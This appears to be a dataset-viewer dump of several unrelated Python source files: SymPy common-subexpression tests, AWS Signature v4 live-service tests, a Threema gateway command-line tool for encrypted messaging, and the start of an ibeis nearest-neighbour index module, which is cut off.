gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
---|---|
import itertools
from sympy import (Add, Pow, Symbol, exp, sqrt, symbols, sympify, cse,
Matrix, S, cos, sin, Eq, Function, Tuple)
from sympy.functions.special.hyper import meijerg
from sympy.simplify import cse_main, cse_opts
from sympy.utilities.pytest import XFAIL
w, x, y, z = symbols('w,x,y,z')
x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11 = symbols('x:12')
def test_numbered_symbols():
ns = cse_main.numbered_symbols(prefix='y')
assert list(itertools.islice(
ns, 0, 10)) == [Symbol('y%s' % i) for i in range(0, 10)]
ns = cse_main.numbered_symbols(prefix='y')
assert list(itertools.islice(
ns, 10, 20)) == [Symbol('y%s' % i) for i in range(10, 20)]
ns = cse_main.numbered_symbols()
assert list(itertools.islice(
ns, 0, 10)) == [Symbol('x%s' % i) for i in range(0, 10)]
# Dummy "optimization" functions for testing.
def opt1(expr):
return expr + y
def opt2(expr):
return expr*z
def test_preprocess_for_cse():
assert cse_main.preprocess_for_cse(x, [(opt1, None)]) == x + y
assert cse_main.preprocess_for_cse(x, [(None, opt1)]) == x
assert cse_main.preprocess_for_cse(x, [(None, None)]) == x
assert cse_main.preprocess_for_cse(x, [(opt1, opt2)]) == x + y
assert cse_main.preprocess_for_cse(
x, [(opt1, None), (opt2, None)]) == (x + y)*z
def test_postprocess_for_cse():
assert cse_main.postprocess_for_cse(x, [(opt1, None)]) == x
assert cse_main.postprocess_for_cse(x, [(None, opt1)]) == x + y
assert cse_main.postprocess_for_cse(x, [(None, None)]) == x
assert cse_main.postprocess_for_cse(x, [(opt1, opt2)]) == x*z
# Note the reverse order of application.
assert cse_main.postprocess_for_cse(
x, [(None, opt1), (None, opt2)]) == x*z + y
def test_cse_single():
# Simple substitution.
e = Add(Pow(x + y, 2), sqrt(x + y))
substs, reduced = cse([e], optimizations=[])
assert substs == [(x0, x + y)]
assert reduced == [sqrt(x0) + x0**2]
def test_cse_single2():
# Simple substitution, test for being able to pass the expression directly
e = Add(Pow(x + y, 2), sqrt(x + y))
substs, reduced = cse(e, optimizations=[])
assert substs == [(x0, x + y)]
assert reduced == [sqrt(x0) + x0**2]
assert isinstance(cse(Matrix([[1]]))[1][0], Matrix)
def test_cse_not_possible():
# No substitution possible.
e = Add(x, y)
substs, reduced = cse([e], optimizations=[])
assert substs == []
assert reduced == [x + y]
# issue 3230
eq = (meijerg((1, 2), (y, 4), (5,), [], x) +
meijerg((1, 3), (y, 4), (5,), [], x))
assert cse(eq) == ([], [eq])
def test_nested_substitution():
# Substitution within a substitution.
e = Add(Pow(w*x + y, 2), sqrt(w*x + y))
substs, reduced = cse([e], optimizations=[])
assert substs == [(x0, w*x + y)]
assert reduced == [sqrt(x0) + x0**2]
def test_subtraction_opt():
# Make sure subtraction is optimized.
e = (x - y)*(z - y) + exp((x - y)*(z - y))
substs, reduced = cse(
[e], optimizations=[(cse_opts.sub_pre, cse_opts.sub_post)])
assert substs == [(x0, (x - y)*(y - z))]
assert reduced == [-x0 + exp(-x0)]
assert cse(-(x - y)*(z - y) + exp(-(x - y)*(z - y))) == \
([(x0, (x - y)*(y - z))], [x0 + exp(x0)])
# issue 978
n = -1 + 1/x
e = n/x/(-n)**2 - 1/n/x
assert cse(e) == ([], [0])
def test_multiple_expressions():
e1 = (x + y)*z
e2 = (x + y)*w
substs, reduced = cse([e1, e2], optimizations=[])
assert substs == [(x0, x + y)]
assert reduced == [x0*z, x0*w]
l = [w*x*y + z, w*y]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == rsubsts
assert reduced == [z + x*x0, x0]
l = [w*x*y, w*x*y + z, w*y]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
assert substs == rsubsts
assert reduced == [x1, x1 + z, x0]
l = [(x - z)*(y - z), x - z, y - z]
substs, reduced = cse(l)
rsubsts, _ = cse(reversed(l))
substitutions = [(x0, x - z), (x1, y - z)]
assert substs == substitutions
assert rsubsts == substitutions
assert reduced == [x0*x1, x0, x1]
l = [w*y + w + x + y + z, w*x*y]
assert cse(l) == ([(x0, w*y)], [w + x + x0 + y + z, x*x0])
assert cse([x + y, x + y + z]) == ([(x0, x + y)], [x0, z + x0])
assert cse([x + y, x + z]) == ([], [x + y, x + z])
assert cse([x*y, z + x*y, x*y*z + 3]) == \
([(x0, x*y)], [x0, z + x0, 3 + x0*z])
A, B, C = symbols('A B C', commutative=False)
l = [A*B*C, A*C]
assert cse(l) == ([], l)
l = [A*B*C, A*B]
assert cse(l) == ([(x0, A*B)], [x0*C, x0])
@XFAIL
def test_powers():
assert cse(x*y**2 + x*y) == ([(x0, x*y)], [x0*y + x0])
def test_issues_1399():
assert cse(w/(x - y) + z/(y - x)) == ([], [(w - z)/(x - y)])
def test_issue_921():
assert cse(
x**5 + x**4 + x**3 + x**2) == ([(x0, x**2)], [x0*(x**3 + x + x0 + 1)])
def test_issue_1104():
assert cse(sin(x**x)/x**x) == ([(x0, x**x)], [sin(x0)/x0])
def test_issue_3164():
e = Eq(x*(-x + 1) + x*(x - 1), 0)
assert cse(e) == ([], [True])
def test_dont_cse_tuples():
from sympy import Subs
f = Function("f")
g = Function("g")
name_val, (expr,) = cse(
Subs(f(x, y), (x, y), (0, 1))
+ Subs(g(x, y), (x, y), (0, 1)))
assert name_val == []
assert expr == (Subs(f(x, y), (x, y), (0, 1))
+ Subs(g(x, y), (x, y), (0, 1)))
name_val, (expr,) = cse(
Subs(f(x, y), (x, y), (0, x + y))
+ Subs(g(x, y), (x, y), (0, x + y)))
assert name_val == [(x0, x + y)]
assert expr == Subs(f(x, y), (x, y), (0, x0)) + \
Subs(g(x, y), (x, y), (0, x0))
def test_pow_invpow():
assert cse(1/x**2 + x**2) == \
([(x0, x**2)], [x0 + 1/x0])
assert cse(x**2 + (1 + 1/x**2)/x**2) == \
([(x0, x**2)], [x0 + (1 + 1/x0)/x0])
assert cse(1/x**2 + (1 + 1/x**2)*x**2) == \
([(x0, x**2)], [x0*(1 + 1/x0) + 1/x0])
assert cse(cos(1/x**2) + sin(1/x**2)) == \
([(x0, x**2)], [sin(1/x0) + cos(1/x0)])
assert cse(cos(x**2) + sin(x**2)) == \
([(x0, x**2)], [sin(x0) + cos(x0)])
assert cse(y/(2 + x**2) + z/x**2/y) == \
([(x0, x**2)], [y/(x0 + 2) + z/(x0*y)])
assert cse(exp(x**2) + x**2*cos(1/x**2)) == \
([(x0, x**2)], [x0*cos(1/x0) + exp(x0)])
assert cse((1 + 1/x**2)/x**2) == \
([(x0, x**2)], [(1 + 1/x0)/x0])
assert cse(x**(2*y) + x**(-2*y)) == \
([(x0, x**(2*y))], [x0 + 1/x0])
def test_postprocess():
eq = (x + 1 + exp((x + 1)/(y + 1)) + cos(y + 1))
assert cse([eq, Eq(x, z + 1), z - 2, (z + 1)*(x + 1)],
postprocess=cse_main.cse_separate) == \
[[(x1, y + 1), (x2, z + 1), (x, x2), (x0, x + 1)],
[x0 + exp(x0/x1) + cos(x1), x2 - 3, x0*x2]]
def test_issue1400():
# previously, this gave 16 constants
from sympy.abc import a, b
B = Function('B')
G = Function('G')
t = Tuple(*
(a, a + S(1)/2, 2*a, b, 2*a - b + 1, (sqrt(z)/2)**(-2*a + 1)*B(2*a -
b, sqrt(z))*B(b - 1, sqrt(z))*G(b)*G(2*a - b + 1),
sqrt(z)*(sqrt(z)/2)**(-2*a + 1)*B(b, sqrt(z))*B(2*a - b,
sqrt(z))*G(b)*G(2*a - b + 1), sqrt(z)*(sqrt(z)/2)**(-2*a + 1)*B(b - 1,
sqrt(z))*B(2*a - b + 1, sqrt(z))*G(b)*G(2*a - b + 1),
(sqrt(z)/2)**(-2*a + 1)*B(b, sqrt(z))*B(2*a - b + 1,
sqrt(z))*G(b)*G(2*a - b + 1), 1, 0, S(1)/2, z/2, -b + 1, -2*a + b,
-2*a))
c = cse(t)
ans = (
[(x0, sqrt(z)), (x1, -b + 1), (x2, B(b, x0)), (x3, 2*a + x1 - 1),
(x4, B(-x1, x0)), (x5, x3 + 1), (x6, B(x3, x0)), (x7, B(x5, x0)), (x8,
2*a), (x9, (x0/2)**(-2*a + 1)*G(b)*G(x5)), (x10, x0*x9)], [(a, a +
S(1)/2, x8, b, x5, x4*x6*x9, x10*x2*x6, x10*x4*x7, x2*x7*x9, 1, 0,
S(1)/2, z/2, x1, -x3, -x8)])
assert ans == c
|
|
#!/usr/bin/env python
# coding: utf-8
"""
Live service tests
------------------
This module contains tests against live AWS services. In order to run these
your AWS access ID and access key need to be specified in the AWS_ACCESS_ID
and AWS_ACCESS_ID environment variables respectively. This can be done with
something like:
$ AWS_ACCESS_ID='ID' AWS_ACCESS_KEY='KEY' python requests_aws4auth_test.py
If these variables are not provided the rest of the tests will still run but
the live service tests will be skipped.
The live tests perform information retrieval operations only, no chargeable
operations are performed!
"""
import unittest
import os
import json
live_access_id = os.getenv('AWS_ACCESS_ID')
live_secret_key = os.getenv('AWS_ACCESS_KEY')
@unittest.skipIf(live_access_id is None or live_secret_key is None,
'AWS_ACCESS_ID and AWS_ACCESS_KEY environment variables not'
' set, skipping live service tests')
class AWS4Auth_LiveService_Test(unittest.TestCase):
"""
Tests against live AWS services. To run these you need to provide your
AWS access ID and access key in the AWS_ACCESS_ID and AWS_ACCESS_KEY
environment variables respectively.
The AWS Support API is currently untested as it requires a premium
subscription, though connection parameters are supplied below if you wish
to try it.
The following services do not work with AWS auth version 4 and are excluded
from the tests:
* Simple Email Service (SES)' - AWS auth v3 only
* Simple Workflow Service - AWS auth v3 only
* Import/Export - AWS auth v2 only
* SimpleDB - AWS auth V2 only
* DevPay - AWS auth v1 only
* Mechanical Turk - has own signing mechanism
"""
services = {
'AppStream': 'appstream.us-east-1.amazonaws.com/applications',
'Auto-Scaling': 'autoscaling.us-east-1.amazonaws.com/?Action=DescribeAutoScalingInstances&Version=2011-01-01',
'CloudFormation': 'cloudformation.us-east-1.amazonaws.com?Action=ListStacks',
'CloudFront': 'cloudfront.amazonaws.com/2014-11-06/distribution?MaxItems=1',
'CloudHSM': {
'method': 'POST',
'req': 'cloudhsm.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target':
'CloudHsmFrontendService.ListAvailableZones',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'CloudSearch': 'cloudsearch.us-east-1.amazonaws.com?Action=ListDomainNames&Version=2013-01-01',
'CloudTrail': 'cloudtrail.us-east-1.amazonaws.com?Action=DescribeTrails',
'CloudWatch (monitoring)': 'monitoring.us-east-1.amazonaws.com?Action=ListMetrics',
'CloudWatch (logs)': {
'method': 'POST',
'req': 'logs.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target': 'Logs_20140328.DescribeLogGroups',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'CodeDeploy': {
'method': 'POST',
'req': 'codedeploy.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target': 'CodeDeploy_20141006.ListApplications',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'Cognito Identity': {
'method': 'POST',
'req': 'cognito-identity.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/json',
'X-Amz_Target': 'AWSCognitoIdentityService.ListIdentityPools'},
'body': json.dumps({
'Operation': 'com.amazonaws.cognito.identity.model#ListIdentityPools',
'Service': 'com.amazonaws.cognito.identity.model#AWSCognitoIdentityService',
'Input': {'MaxResults': 1}})},
'Cognito Sync': {
'method': 'POST',
'req': 'cognito-sync.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/json',
'X-Amz_Target': 'AWSCognitoSyncService.ListIdentityPoolUsage'},
'body': json.dumps({
'Operation': 'com.amazonaws.cognito.sync.model#ListIdentityPoolUsage',
'Service': 'com.amazonaws.cognito.sync.model#AWSCognitoSyncService',
'Input': {'MaxResults': '1'}})},
'Config': {
'method': 'POST',
'req': 'config.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target':
'StarlingDoveService.DescribeDeliveryChannels',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'DataPipeline': {
'req': 'datapipeline.us-east-1.amazonaws.com?Action=ListPipelines',
'headers': {'X-Amz-Target': 'DataPipeline.ListPipelines'},
'body': '{}'},
'Direct Connect': {
'method': 'POST',
'req': 'directconnect.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target': 'OvertureService.DescribeConnections',
'Content-Type': 'application/x-amz-json-1.1'},
'body': '{}'},
'DynamoDB': {
'method': 'POST',
'req': 'dynamodb.us-east-1.amazonaws.com',
'headers': {'X-Amz-Target': 'DynamoDB_20111205.ListTables',
'Content-Type': 'application/x-amz-json-1.0'},
'body': '{}'},
'Elastic Beanstalk': 'elasticbeanstalk.us-east-1.amazonaws.com/'
'?Action=ListAvailableSolutionStacks&Version=2010-12-01',
'ElastiCache': 'elasticache.us-east-1.amazonaws.com/?Action=DescribeCacheClusters&Version=2014-07-15',
'EC2': 'ec2.us-east-1.amazonaws.com/?Action=DescribeRegions&Version=2014-06-15',
'EC2 Container Service': 'ecs.us-east-1.amazonaws.com/?Action=ListClusters&Version=2014-11-13',
'Elastic Load Balancing': 'elasticloadbalancing.us-east-1.amazonaws.com/'
'?Action=DescribeLoadBalancers&Version=2012-06-01',
'Elastic MapReduce': 'elasticmapreduce.us-east-1.amazonaws.com/?Action=ListClusters&Version=2009-03-31',
'Elastic Transcoder': 'elastictranscoder.us-east-1.amazonaws.com/2012-09-25/pipelines',
'Glacier': {
'req': 'glacier.us-east-1.amazonaws.com/-/vaults',
'headers': {'X-Amz-Glacier-Version': '2012-06-01'}},
'Identity and Access Management (IAM)': 'iam.amazonaws.com/?Action=ListUsers&Version=2010-05-08',
'Key Management Service': {
'method': 'POST',
'req': 'kms.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/x-amz-json-1.1',
'X-Amz-Target': 'TrentService.ListKeys'},
'body': '{}'},
'Kinesis': {
'method': 'POST',
'req': 'kinesis.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/x-amz-json-1.1',
'X-Amz-Target': 'Kinesis_20131202.ListStreams'},
'body': '{}'},
'Lambda': 'lambda.us-east-1.amazonaws.com/2014-11-13/functions/',
'Opsworks': {
'method': 'POST',
'req': 'opsworks.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/x-amz-json-1.1',
'X-Amz-Target': 'OpsWorks_20130218.DescribeStacks'},
'body': '{}'},
'Redshift': 'redshift.us-east-1.amazonaws.com/?Action=DescribeClusters&Version=2012-12-01',
'Relational Database Service (RDS)': 'rds.us-east-1.amazonaws.com/'
'?Action=DescribeDBInstances&Version=2012-09-17',
'Route 53': 'route53.amazonaws.com/2013-04-01/hostedzone',
'Simple Storage Service (S3)': 's3.amazonaws.com',
'Simple Notification Service (SNS)': 'sns.us-east-1.amazonaws.com/?Action=ListTopics&Version=2010-03-31',
'Simple Queue Service (SQS)': 'sqs.us-east-1.amazonaws.com/?Action=ListQueues',
'Storage Gateway': {
'method': 'POST',
'req': 'storagegateway.us-east-1.amazonaws.com',
'headers': {'Content-Type': 'application/x-amz-json-1.1',
'X-Amz-Target': 'StorageGateway_20120630.ListGateways'},
'body': '{}'},
'Security Token Service': 'sts.amazonaws.com/?Action=GetSessionToken&Version=2011-06-15',
# 'Support': {
# 'method': 'POST',
# 'req': 'support.us-east-1.amazonaws.com',
# 'headers': {'Content-Type': 'application/x-amz-json-1.0',
# 'X-Amz-Target': 'Support_20130415.DescribeServices'},
# 'body': '{}'},
}
def test_live_services(self):
for service_name in sorted(self.services):
params = self.services[service_name]
# use new 3.4 subtests if available
if hasattr(self, 'subTest'):
with self.subTest(service_name=service_name, params=params):
self._test_live_service(service_name, params)
else:
self._test_live_service(service_name, params)
def _test_live_service(self, service_name, params):
if isinstance(params, dict):
method = params.get('method', 'GET')
path_qs = params['req']
headers = params.get('headers', {})
body = params.get('body', '')
else:
method = 'GET'
path_qs = params
headers = {}
body = ''
service = path_qs.split('.')[0]
url = 'https://' + path_qs
region = 'us-east-1'
auth = AWS4Auth(live_access_id, live_secret_key, region, service)
response = requests.request(method, url, auth=auth,
data=body, headers=headers)
# suppress socket close warnings
response.connection.close()
self.assertTrue(response.ok)
def test_mobileanalytics(self):
url = 'https://mobileanalytics.us-east-1.amazonaws.com/2014-06-05/events'
service = 'mobileanalytics'
region = 'us-east-1'
dt = datetime.datetime.utcnow()
date = dt.strftime('%Y%m%d')
sig_key = AWS4SigningKey(live_secret_key, region, service, date)
auth = AWS4Auth(live_access_id, sig_key)
headers = {'Content-Type': 'application/json',
'X-Amz-Date': dt.strftime('%Y%m%dT%H%M%SZ'),
'X-Amz-Client-Context':
json.dumps({
'client': {'client_id': 'a', 'app_title': 'a'},
'custom': {},
'env': {'platform': 'a'},
'services': {}})}
body = json.dumps({
'events': [{
'eventType': 'a',
'timestamp': dt.strftime('%Y-%m-%dT%H:%M:%S.000Z'),
'session': {}
}]
})
response = requests.post(url, auth=auth, headers=headers, data=body)
response.connection.close()
self.assertTrue(response.ok)
|
|
"""
The command line interface for the Threema gateway service.
"""
import binascii
import os
import re
import click
import logbook
import logbook.more
from threema.gateway import Connection
from threema.gateway import __version__ as _version
from threema.gateway import (
e2e,
feature_level,
simple,
util,
)
from threema.gateway.key import (
HMAC,
Key,
)
from threema.gateway.util import AioRunMixin
_logging_handler = None
_logging_levels = {
1: logbook.CRITICAL,
2: logbook.ERROR,
3: logbook.WARNING,
4: logbook.NOTICE,
5: logbook.INFO,
6: logbook.DEBUG,
7: logbook.TRACE,
}
# Apply mock URL when starting CLI in debug mode
_test_port = os.environ.get('THREEMA_TEST_API')
if _test_port is not None:
_mock_url = 'http://{}:{}'.format('127.0.0.1', _test_port)
Connection.urls = {key: value.replace('https://msgapi.threema.ch', _mock_url)
for key, value in Connection.urls.items()}
click.echo(('WARNING: Currently running in test mode!'
'The Threema Gateway Server will not be contacted!'), err=True)
class _MockConnection(AioRunMixin):
def __init__(self, private_key, public_key, identity=None):
super().__init__(blocking=False)
self.key = private_key
self._public_key = public_key
self.id = identity
async def get_public_key(self, _):
return self._public_key
@click.group()
@click.option('-v', '--verbosity', type=click.IntRange(0, len(_logging_levels)),
default=0, help="Logging verbosity.")
@click.option('-c', '--colored', is_flag=True, help='Colourise logging output.')
@click.pass_context
def cli(ctx, verbosity, colored):
"""
Command Line Interface. Use --help for details.
"""
if verbosity > 0:
# Enable logging
util.enable_logging(level=_logging_levels[verbosity])
# Get handler class
if colored:
handler_class = logbook.more.ColorizedStderrHandler
else:
handler_class = logbook.StderrHandler
# Set up logging handler
handler = handler_class(level=_logging_levels[verbosity])
handler.push_application()
global _logging_handler
_logging_handler = handler
# Store on context
ctx.obj = {}
@cli.command(short_help='Show version information.', help="""
Show the current version of the Python SDK and the implemented feature
level.
""")
def version():
click.echo('Version: {}'.format(_version))
click.echo('Feature Level: {}'.format(feature_level))
@cli.command(short_help='Encrypt a text message.', help="""
Encrypt standard input using the given sender PRIVATE KEY and recipient
PUBLIC KEY. Prints two lines to standard output: first the nonce (hex),
and then the encrypted box (hex).
""")
@click.argument('private_key')
@click.argument('public_key')
@util.aio_run
async def encrypt(private_key, public_key):
# Get key instances
private_key = util.read_key_or_key_file(private_key, Key.Type.private)
public_key = util.read_key_or_key_file(public_key, Key.Type.public)
# Read text from stdin
text = click.get_text_stream('stdin').read()
# Print nonce and message as hex
connection = _MockConnection(private_key, public_key)
message = e2e.TextMessage(connection, text=text, to_id='')
nonce, message = await message.send(get_data_only=True)
click.echo()
click.echo(binascii.hexlify(nonce))
click.echo(binascii.hexlify(message))
@cli.command(short_help='Decrypt a text message.', help="""
Decrypt standard input using the given recipient PRIVATE KEY and sender PUBLIC KEY.
The NONCE must be given on the command line, and the box (hex) on standard input.
Prints the decrypted text message to standard output.
""")
@click.argument('private_key')
@click.argument('public_key')
@click.argument('nonce')
@util.aio_run
async def decrypt(private_key, public_key, nonce):
# Get key instances
private_key = util.read_key_or_key_file(private_key, Key.Type.private)
public_key = util.read_key_or_key_file(public_key, Key.Type.public)
# Convert nonce to bytes
nonce = binascii.unhexlify(nonce)
# Read message from stdin and convert to bytes
message = click.get_text_stream('stdin').read()
message = binascii.unhexlify(message)
# Unpack message
connection = _MockConnection(private_key, public_key)
parameters = {'from_id': '', 'message_id': '', 'date': ''}
message = await e2e.Message.receive(connection, parameters, nonce, message)
# Ensure that this is a text message
if message.type is not e2e.Message.Type.text_message:
raise TypeError('Cannot decrypt message type {} in CLI'.format(message.type))
# Print text
click.echo()
click.echo(message.text)
@cli.command(short_help='Generate a new key pair.', help="""
Generate a new key pair and write the PRIVATE and PUBLIC keys to
the respective files.
""")
@click.argument('private_key_file')
@click.argument('public_key_file')
def generate(private_key_file, public_key_file):
# Generate key pair and hexlify both keys
private_key, public_key = [Key.encode(key) for key in Key.generate_pair()]
# Write keys to files
with open(private_key_file, 'w') as sk_file, open(public_key_file, 'w') as pk_file:
sk_file.write(private_key + '\n')
pk_file.write(public_key + '\n')
# noinspection PyShadowingBuiltins
@cli.command(short_help='Hash an email address or phone number.', help="""
Hash an email address or a phone number for identity lookup.
Prints the hash in hex.
""")
@click.option('-e', '--email', help='An email address.')
@click.option('-p', '--phone', help='A phone number in E.164 format.')
def hash(**arguments):
mode = {key: value for key, value in arguments.items() if value is not None}
# Check that either email or phone has been specified
if len(mode) != 1:
error = 'Please specify exactly one email address or one phone number.'
raise click.ClickException(error)
# Unpack message and hash type
hash_type, message = mode.popitem()
# Email or phone?
if hash_type == 'email':
message = message.lower().strip()
else:
message = re.sub(r'[^0-9]', '', message)
click.echo(HMAC.hash(message, hash_type).hexdigest())
@cli.command(short_help='Derive the public key from the private key.', help="""
Derive the public key that corresponds with the given PRIVATE KEY.
""")
@click.argument('private_key')
def derive(private_key):
# Get private key instance and derive public key
private_key = util.read_key_or_key_file(private_key, Key.Type.private)
public_key = Key.derive_public(private_key)
# Return hex encoded public key
click.echo(Key.encode(public_key))
@cli.command(short_help='Send a text message using simple mode.', help="""
Send atext message from standard input with server-side encryption to the given ID.
FROM is the API identity and SECRET is the API secret.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.pass_context
@util.aio_run
async def send_simple(ctx, **arguments):
# Read message from stdin
text = click.get_text_stream('stdin').read().strip()
# Create connection
connection = Connection(arguments['from'], arguments['secret'], **ctx.obj)
async with connection:
# Create message
message = simple.TextMessage(
connection=connection,
to_id=arguments['to'],
text=text
)
# Send message
click.echo()
click.echo(await message.send())
@cli.command(short_help='Send a text message using end-to-end mode.', help="""
Encrypt standard input and send the text message to the given ID.
FROM is the API identity and SECRET is the API secret.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.argument('private_key')
@click.option('-k', '--public-key', help="""
The public key of the recipient. Will be fetched automatically if not provided.
""")
@click.pass_context
@util.aio_run
async def send_e2e(ctx, **arguments):
# Get key instances
private_key = util.read_key_or_key_file(arguments['private_key'], Key.Type.private)
if arguments['public_key'] is not None:
public_key = util.read_key_or_key_file(arguments['public_key'], Key.Type.public)
else:
public_key = None
# Read message from stdin
text = click.get_text_stream('stdin').read().strip()
# Create connection
connection = Connection(
identity=arguments['from'],
secret=arguments['secret'],
key=private_key,
**ctx.obj
)
async with connection:
# Create message
message = e2e.TextMessage(
connection=connection,
to_id=arguments['to'],
key=public_key,
text=text
)
# Send message
click.echo()
click.echo(await message.send())
@cli.command(short_help='Send an image using end-to-end mode.', help="""
Encrypt and send an image ('jpeg' or 'png') to the given ID.
FROM is the API identity and SECRET is the API secret.
IMAGE_PATH is a relative or absolute path to an image.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.argument('private_key')
@click.argument('image_path')
@click.option('-k', '--public-key', help="""
The public key of the recipient. Will be fetched automatically if not provided.
""")
@click.pass_context
@util.aio_run
async def send_image(ctx, **arguments):
# Get key instances
private_key = util.read_key_or_key_file(arguments['private_key'], Key.Type.private)
if arguments['public_key'] is not None:
public_key = util.read_key_or_key_file(arguments['public_key'], Key.Type.public)
else:
public_key = None
# Create connection
connection = Connection(
identity=arguments['from'],
secret=arguments['secret'],
key=private_key,
**ctx.obj
)
async with connection:
# Create message
message = e2e.ImageMessage(
connection=connection,
to_id=arguments['to'],
key=public_key,
image_path=arguments['image_path']
)
# Send message
click.echo(await message.send())
@cli.command(short_help='Send a video using end-to-end mode.', help="""
Encrypt and send a video ('mp4') including a thumbnail to the given ID.
FROM is the API identity and SECRET is the API secret.
VIDEO_PATH is a relative or absolute path to a video.
THUMBNAIL_PATH is a relative or absolute path to a thumbnail.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.argument('private_key')
@click.argument('video_path')
@click.argument('thumbnail_path')
@click.option('-k', '--public-key', help="""
The public key of the recipient. Will be fetched automatically if not provided.
""")
@click.option('-d', '--duration', help="""
Duration of the video in seconds. Defaults to 0.
""", default=0)
@click.pass_context
@util.aio_run
async def send_video(ctx, **arguments):
# Get key instances
private_key = util.read_key_or_key_file(arguments['private_key'], Key.Type.private)
if arguments['public_key'] is not None:
public_key = util.read_key_or_key_file(arguments['public_key'], Key.Type.public)
else:
public_key = None
# Create connection
connection = Connection(
identity=arguments['from'],
secret=arguments['secret'],
key=private_key,
**ctx.obj
)
async with connection:
# Create message
message = e2e.VideoMessage(
connection=connection,
to_id=arguments['to'],
key=public_key,
duration=arguments['duration'],
video_path=arguments['video_path'],
thumbnail_path=arguments['thumbnail_path']
)
# Send message
click.echo(await message.send())
@cli.command(short_help='Send a file using end-to-end mode.', help="""
Encrypt and send a file to the given ID, optionally with a thumbnail.
FROM is the API identity and SECRET is the API secret.
FILE_PATH is a relative or absolute path to a file.
Prints the message ID on success.
""")
@click.argument('to')
@click.argument('from')
@click.argument('secret')
@click.argument('private_key')
@click.argument('file_path')
@click.option('-k', '--public-key', help="""
The public key of the recipient. Will be fetched automatically if not provided.
""")
@click.option('-t', '--thumbnail-path', help="""
The relative or absolute path to a thumbnail.
""")
@click.pass_context
@util.aio_run
async def send_file(ctx, **arguments):
# Get key instances
private_key = util.read_key_or_key_file(arguments['private_key'], Key.Type.private)
if arguments['public_key'] is not None:
public_key = util.read_key_or_key_file(arguments['public_key'], Key.Type.public)
else:
public_key = None
# Create connection
connection = Connection(
identity=arguments['from'],
secret=arguments['secret'],
key=private_key,
**ctx.obj
)
async with connection:
# Create message
message = e2e.FileMessage(
connection=connection,
to_id=arguments['to'],
key=public_key,
file_path=arguments['file_path'],
thumbnail_path=arguments['thumbnail_path']
)
# Send message
click.echo(await message.send())
@cli.command(short_help='Lookup a Threema ID or the public key.', help="""
Lookup the public key of the Threema ID or the ID linked to either the
given email address or the given phone number.
FROM is the API identity and SECRET is the API secret.
""")
@click.argument('from')
@click.argument('secret')
@click.option('-e', '--email', help='An email address.')
@click.option('-p', '--phone', help='A phone number in E.164 format.')
@click.option('-i', '--id', help='A Threema ID.')
@click.pass_context
@util.aio_run
async def lookup(ctx, **arguments):
modes = ['email', 'phone', 'id']
mode = {key: value for key, value in arguments.items()
if key in modes and value is not None}
# Check that one of the modes has been selected
if len(mode) != 1:
error = 'Please specify exactly one ID, one email address or one phone number.'
raise click.ClickException(error)
# Create connection
connection = Connection(arguments['from'], secret=arguments['secret'], **ctx.obj)
async with connection:
# Do lookup
if 'id' in mode:
public_key = await connection.get_public_key(arguments['id'])
click.echo(Key.encode(public_key))
else:
click.echo(await connection.get_id(**mode))
@cli.command(short_help='Lookup the reception capabilities of a Threema ID', help="""
Lookup the reception capabilities of a Threema ID.
FROM is the API identity and SECRET is the API secret.
Prints a set of capabilities in alphabetical order on success.
""")
@click.argument('from')
@click.argument('secret')
@click.argument('id')
@click.pass_context
@util.aio_run
async def capabilities(ctx, **arguments):
# Create connection
connection = Connection(arguments['from'], arguments['secret'], **ctx.obj)
async with connection:
# Lookup and format returned capabilities
coroutine = connection.get_reception_capabilities(arguments['id'])
capabilities_ = await coroutine
click.echo(', '.join(sorted(capability.value for capability in capabilities_)))
# noinspection PyShadowingBuiltins
@cli.command(short_help='Get the number of credits left on the account', help="""
Retrieve the number of credits left on the used account.
FROM is the API identity and SECRET is the API secret.
""")
@click.argument('from')
@click.argument('secret')
@click.pass_context
@util.aio_run
async def credits(ctx, **arguments):
# Create connection
connection = Connection(arguments['from'], arguments['secret'], **ctx.obj)
async with connection:
# Get and print credits
click.echo(await connection.get_credits())
def main():
exc = None
try:
cli()
except Exception as exc_:
error = str(exc_)
exc = exc_
else:
error = None
# Print error (if any)
if error is not None:
click.echo('An error occurred:', err=True)
click.echo(error, err=True)
# Re-raise
if exc is not None:
raise exc
# Remove logging handler
if _logging_handler is not None:
_logging_handler.pop_application()
if __name__ == '__main__':
main()
|
|
# -*- coding: utf-8 -*-
"""
python -c "import doctest, ibeis; print(doctest.testmod(ibeis.model.hots.hots_nn_index))"
python -m doctest -v ibeis/model/hots/hots_nn_index.py
python -m doctest ibeis/model/hots/hots_nn_index.py
"""
from __future__ import absolute_import, division, print_function
# Standard
from six.moves import zip, map, range
#from itertools import chain
import sys
# Science
import numpy as np
# UTool
import utool
# VTool
from ibeis.other import ibsfuncs
import vtool.nearest_neighbors as nntool
(print, print_, printDBG, rrr, profile) = utool.inject(__name__, '[nnindex]', DEBUG=False)
NOCACHE_FLANN = '--nocache-flann' in sys.argv
def get_indexed_cfgstr(ibs, aid_list):
"""
Creates a config string for the input into the nearest neighbors index
It is based off of the features which were computed for it and the indexes
of the input annotations.
TODO: We should probably use the Annotation UUIDS rather than the ROWIDs
to compute this configstr
"""
feat_cfgstr = ibs.cfg.feat_cfg.get_cfgstr()
